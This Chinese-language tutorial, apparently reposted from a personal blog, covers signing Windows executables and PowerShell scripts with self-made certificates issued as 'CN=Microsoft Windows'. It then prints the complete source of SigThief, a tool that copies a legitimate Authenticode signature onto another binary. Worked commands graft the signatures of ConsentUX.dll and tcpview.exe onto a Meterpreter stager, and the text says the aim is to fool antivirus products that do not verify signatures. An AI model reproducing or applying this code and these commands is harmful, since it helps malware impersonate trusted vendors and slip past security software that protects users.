Python使用sigthief簽發證書的實現步驟
證書制作工具下載: https://github.com/3gstudent/signtools
制作並簽發證書:
正常情況下,針對exe簽發證書有如下幾個步驟.
1.查詢一個程序中存在的證書,可以使用下面三個命令。
c:\> signtools Get-AuthenticodeSignature C:\Windows\System32\ConsentUX.dll c:\> signtools signtool.exe verify /v C:\Windows\System32\ConsentUX.dll c:\> signtools sigcheck.exe -q C:\Windows\System32\ConsentUX.dll
2.使用makecert命令制作證書,sv-私鑰文件名,ss-主題的證書存儲名稱,n-證書頒發對象,r-證書存儲位置。
c:\> signtools makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer c:\> signtools cert2spc Root.cer Root.spc c:\> signtools pvk2pfx -pvk Root.pvk -pi 1233 -spc Root.spc -pfx Root.pfx -f
3.註冊證書與簽發證書。
c:\> signtools certmgr.exe -add -c Root.cer -s -r localmachine root c:\> signtools signtool sign /f Root.pfx /p 1233 lyshark.exe
而如果要給PowerShell腳本添加證書,則執行如下命令即可.
1.生成證書文件
c:\> makecert -n "CN=Microsoft Windows" -r -eku 1.3.6.1.5.5.7.3.3 -sv certtest.pvk certtest.cer c:\> cert2spc certtest.cer certtest.spc c:\> pvk2pfx -pvk certtest.pvk -pi 123123 -spc certtest.spc -pfx certtest.pfx -f
2.給powershell腳本簽名
c:\> powershell c:\> $cert = Get-PfxCertificate certtest.pfx c:\> Set-AuthenticodeSignature -Filepath lyshark.ps1 -Cert $cert
偽造PE文件證書:
有些反病毒軟件供應商優先考慮某些證書頒發機構而不檢查簽名是否真正有效,並且有一些隻是檢查以查看certTable是否填充瞭某些值。這個工具讓你快速將從已簽名的PE文件中刪除簽名並將其附加到另一個文件,修復證書表以對文件進行簽名。
開源工具SigThief可用於偽造證書,將下方代碼保存為sigthief.py即可:
import sys
import struct
import shutil
import io
from optparse import OptionParser
def gather_file_info_win(binary):
"""
Borrowed from BDF...
I could just skip to certLOC... *shrug*
"""
flItms = {}
binary = open(binary, 'rb')
binary.seek(int('3C', 16))
flItms['buffer'] = 0
flItms['JMPtoCodeAddress'] = 0
flItms['dis_frm_pehdrs_sectble'] = 248
flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
# Start of COFF
flItms['COFF_Start'] = flItms['pe_header_location'] + 4
binary.seek(flItms['COFF_Start'])
flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
binary.seek(flItms['COFF_Start'] + 2, 0)
flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
binary.seek(flItms['COFF_Start'] + 16, 0)
flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
#End of COFF
flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
#if flItms['SizeOfOptionalHeader']:
#Begin Standard Fields section of Optional Header
binary.seek(flItms['OptionalHeader_start'])
flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
flItms['SizeOfUninitializedData'] = struct.unpack("<I",
binary.read(4))[0]
flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
if flItms['Magic'] != 0x20B:
flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
# End Standard Fields section of Optional Header
# Begin Windows-Specific Fields of Optional Header
if flItms['Magic'] == 0x20B:
flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
else:
flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
binary.read(2))[0]
flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
binary.read(2))[0]
flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfImageLoc'] = binary.tell()
flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
if flItms['Magic'] == 0x20B:
flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
else:
flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0] # zero
flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
# End Windows-Specific Fields of Optional Header
# Begin Data Directories of Optional Header
flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
#ImportTable SIZE|LOC
flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
flItms['CertTableLOC'] = binary.tell()
flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
binary.close()
return flItms
def copyCert(exe):
flItms = gather_file_info_win(exe)
if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
# not signed
print("Input file Not signed!")
sys.exit(-1)
with open(exe, 'rb') as f:
f.seek(flItms['CertLOC'], 0)
cert = f.read(flItms['CertSize'])
return cert
def writeCert(cert, exe, output):
flItms = gather_file_info_win(exe)
if not output:
output = output = str(exe) + "_signed"
shutil.copy2(exe, output)
print("Output file: {0}".format(output))
with open(exe, 'rb') as g:
with open(output, 'wb') as f:
f.write(g.read())
f.seek(0)
f.seek(flItms['CertTableLOC'], 0)
f.write(struct.pack("<I", len(open(exe, 'rb').read())))
f.write(struct.pack("<I", len(cert)))
f.seek(0, io.SEEK_END)
f.write(cert)
print("Signature appended. \nFIN.")
def outputCert(exe, output):
cert = copyCert(exe)
if not output:
output = str(exe) + "_sig"
print("Output file: {0}".format(output))
open(output, 'wb').write(cert)
print("Signature ripped. \nFIN.")
def check_sig(exe):
flItms = gather_file_info_win(exe)
if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
# not signed
print("Inputfile Not signed!")
else:
print("Inputfile is signed!")
def truncate(exe, output):
flItms = gather_file_info_win(exe)
if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
# not signed
print("Inputfile Not signed!")
sys.exit(-1)
else:
print( "Inputfile is signed!")
if not output:
output = str(exe) + "_nosig"
print("Output file: {0}".format(output))
shutil.copy2(exe, output)
with open(output, "r+b") as binary:
print('Overwriting certificate table pointer and truncating binary')
binary.seek(-flItms['CertSize'], io.SEEK_END)
binary.truncate()
binary.seek(flItms['CertTableLOC'], 0)
binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
print("Signature removed. \nFIN.")
def signfile(exe, sigfile, output):
flItms = gather_file_info_win(exe)
cert = open(sigfile, 'rb').read()
if not output:
output = output = str(exe) + "_signed"
shutil.copy2(exe, output)
print("Output file: {0}".format(output))
with open(exe, 'rb') as g:
with open(output, 'wb') as f:
f.write(g.read())
f.seek(0)
f.seek(flItms['CertTableLOC'], 0)
f.write(struct.pack("<I", len(open(exe, 'rb').read())))
f.write(struct.pack("<I", len(cert)))
f.seek(0, io.SEEK_END)
f.write(cert)
print("Signature appended. \nFIN.")
if __name__ == "__main__":
usage = 'usage: %prog [options]'
parser = OptionParser()
parser.add_option("-i", "--file", dest="inputfile",
help="input file", metavar="FILE")
parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
help='rip signature off inputfile')
parser.add_option('-a', '--add', dest='addsig', action='store_true',
help='add signautre to targetfile')
parser.add_option('-o', '--output', dest='outputfile',
help='output file')
parser.add_option('-s', '--sig', dest='sigfile',
help='binary signature from disk')
parser.add_option('-t', '--target', dest='targetfile',
help='file to append signature to')
parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
help='file to check if signed; does not verify signature')
parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
help='truncate signature (i.e. remove sig)')
(options, args) = parser.parse_args()
# rip signature
# inputfile and rip to outputfile
if options.inputfile and options.ripsig:
print("Ripping signature to file!")
outputCert(options.inputfile, options.outputfile)
sys.exit()
# copy from one to another
# inputfile and rip to targetfile to outputfile
if options.inputfile and options.targetfile:
cert = copyCert(options.inputfile)
writeCert(cert, options.targetfile, options.outputfile)
sys.exit()
# check signature
# inputfile
if options.inputfile and options.checksig:
check_sig(options.inputfile)
sys.exit()
# add sig to target file
if options.targetfile and options.sigfile:
signfile(options.targetfile, options.sigfile, options.outputfile)
sys.exit()
# truncate
if options.inputfile and options.truncate:
truncate(options.inputfile, options.outputfile)
sys.exit()
parser.print_help()
parser.error("You must do something!")
我們需要找一個帶有證書的文件,然後通過使用sigthief.py完成證書的克隆。此處就拿系統中的ConsentUX.dll演示。
c:\> python sigthief.py -i ConsentUX.dll -t lyshark.exe -o check.exe Output file: check.exe Signature appended. FIN.
也可以從二進制文件中獲取簽名並將其添加到另一個二進制文件中
$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe Output file: /tmp/msftesting_tcpview.exe Signature appended. FIN.
將簽名保存到磁盤以供以後使用,提供瞭一個轉存功能。
$ ./sigthief.py -i tcpview.exe -r Ripping signature to file! Output file: tcpview.exe_sig Signature ripped. FIN. ```BASH 使用翻錄簽名 ```BASH $ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe Output file: x86_meterpreter_stager.exe_signed Signature appended. FIN. ```BASH 截斷(刪除)簽名 這實際上有非常有趣的結果,可以幫助您找到重視代碼功能簽名的AV) ```BASH $ ./sigthief.py -i tcpview.exe -T Inputfile is signed! Output file: tcpview.exe_nosig Overwriting certificate table pointer and truncating binary Signature removed. FIN.
文章出處:https://www.cnblogs.com/lyshark
以上就是Python使用sigthief簽發證書的實現步驟的詳細內容,更多關於Python使用sigthief簽發證書的資料請關註WalkonNet其它相關文章!
推薦閱讀:
- python基礎之文件的備份以及定位
- Python全棧之文件操作
- Python使用os模塊實現更高效地讀寫文件
- python基礎之文件處理知識總結
- python面試題之read、readline和readlines的區別詳解